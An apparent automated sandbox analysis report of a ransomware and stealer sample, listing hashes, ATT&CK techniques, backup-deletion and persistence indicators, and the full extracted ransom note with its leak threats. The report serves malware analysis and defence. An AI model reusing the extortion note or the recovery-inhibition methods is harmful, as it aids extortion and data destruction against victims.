0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad

Analysis

max time kernel
95s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 09:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
Size

1.2MB
MD5

cc3652c078fa2bdfbbfae33335c30bda
SHA1

b3d3ad0c2c9d526717f55c431d51c2f1e957325b
SHA256

0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad
SHA512

d027e1df8c10516b81e47ef840f0e2baf971c0e0c4e77ff0fdc0122bbbb66ed210fd78336cb40d05c76d91838ae89ebb3304050dbf7fb7eeec73d47d1d26ec3d
SSDEEP

12288:QKMzISi3LAStu+KxSgNrc+YCiYKjqxJUZGhEzXMOalwmtnvXigwwdAnIK4RHLrog:vMsSibWXpNrcVEnvXigwwdAIK4R/W3

Score

10^/10

credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\bg-BG\!!!HOW_TO_DECRYPT!!!.mht

Ransom Note

From: =?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?= Subject: Date: San, 00 Jan 2000 00:00:00 +0000 MIME-Version: 1.0 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: quoted-printable X-MimeOLE: Produced By Microsoft MimeOLE =EF=BB=BF<!DOCTYPE HTML> <!DOCTYPE html PUBLIC "" "">=20 <HTML lang=3D"ru">=20 <HEAD>=20 <META = content=3D"IE = 3D11.0000" http-equiv=3D"X - UA - Compatible">=20 <META charset=3D"utf-8">=20 <TITLE>!!!HOW_TO_DECRYPT!!!</TITLE>=20 <LINK href=3D"style.css" rel=3D"stylesheet">=20 <META name=3D"GENERATOR" content=3D"MSHTML 11.00.10570.1001">=20 </HEAD>=20 <BODY>=20 =20 =20 All your valiable data has been encrypted! =20 =20 =20 Hello! Sorry, but we have inform you that your order has been blocked due to the issue of securities. Make sure your data is not blocked.=20 All your valuable files were encrypted with strong encryption algorithms AES-256 + RSA-2048 + CHACHA and renamed. You can read about these algorithms in Google.=20 Your unique encryption key is stored securely on our server and your data can be decrypted quickly and securely. =20 We can prove that we can decrypt all of your data. Please just send us 3 small encrypted files which are randomly stored on your server.=20 We will decrypt these files and send them to you as a proof. Please note that files for free test decryption should not contain valuable information. =20 As you know information is the most valuable resource in the world. That's why all of your confidential data was uploaded to our servers.=20 If you need proof, just write us and we will show you that we have your files. If you will not start a dialogue with us in 72 hours=20 we will be forced to publish your files in the Darknet. Your customers and partners will be informed about the data leak by email or phone. =20 This way, your reputation will be ruined. If you will not react, we will be forced to sell the most important information such as databases=20 to interested parties to generate some profit. Please understand that we are just doing our job. We don't want to harm your company.=20 Think of this incident as an opportunity to improve your security. We are opened for dialogue and ready to help you. We are professionals,=20 please don't try to fool us. =20 =20 If you want to resolve this situation, please write to ALL of these 2 email addresses: =20 [email protected] [email protected] In subject line please write your ID: 6558281558436675638 =20 =20 =20 Important! =20 * We asking to send your message to ALL of our 2 email adresses because for various reasons, your email may not be delivered. =20 * Our message may be recognized as spam, so be sure to check the spam folder. =20 * If we do not respond to you within 24 hours, write to us from another email address. Use Gmail, Yahoo, Hotmail, or any other well-known email service. =20 Important =20 * Please don't waste the time, it will result only additinal damage to your company! =20 * Please do not try to decrypt the files yourself. We will not be able to help you if files will be modified. =20 =20 =20 </BODY> =20 </HTML>

Emails

[email protected] [email protected] In

URLs

http-equiv=3D"X

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4960	bcdedit.exe
2116	bcdedit.exe

Renames multiple (659) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
920	wbadmin.exe
4764	wbadmin.exe

Drops file in Drivers directory 13 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\networks.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\protocol.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\services	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\services.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\networks.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\protocol	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\protocol.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\services.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\networks	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSFEEditor = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe\" e"	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	\??\E:\$RECYCLE.BIN\S-1-5-21-940901362-3608833189-1915618603-1000\desktop.ini	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 39 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\M:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\T:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\E:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\O:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\Y:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\Q:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\S:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\F:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\B:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\A:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\G:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\I:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\R:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\U:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\V:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\D:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\L:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\N:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\Z:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\K:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\P:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened (read-only)	\??\W:	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\ResPriImageList	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateModelTask	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\BCD-Template.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\DRIVERS	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Report policies	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\ResPriHMImageListLowCost	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\ELAM.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateModelTask.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\eed437e2-8198-4a4c-91d4-a622f1e097ce.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Report policies.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\config\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\SAM	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\ELAM	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\db3cc827-342c-4305-aa14-4ce47c3cdb98	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\ResPriHMImageList	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\d8f6767c-b100-4069-9b4e-10735b27bee4.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\e0236208-3264-4801-b243-d59121825b9b	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\db3cc827-342c-4305-aa14-4ce47c3cdb98.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\System32\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\BCD-Template	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\db3cc827-342c-4305-aa14-4ce47c3cdb98.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\eed437e2-8198-4a4c-91d4-a622f1e097ce.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\SYSTEM	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\removed-files	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\FA000000050.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\precomplete	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\precomplete.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f33\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\FA000000011.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\postSigningData	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f33\FA000000033.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\FA000000050	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\ZeroByteFile.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\ZeroByteFile	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\removed-files.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\FA000000008	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\initial_preferences.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f2\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\FA000000008.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
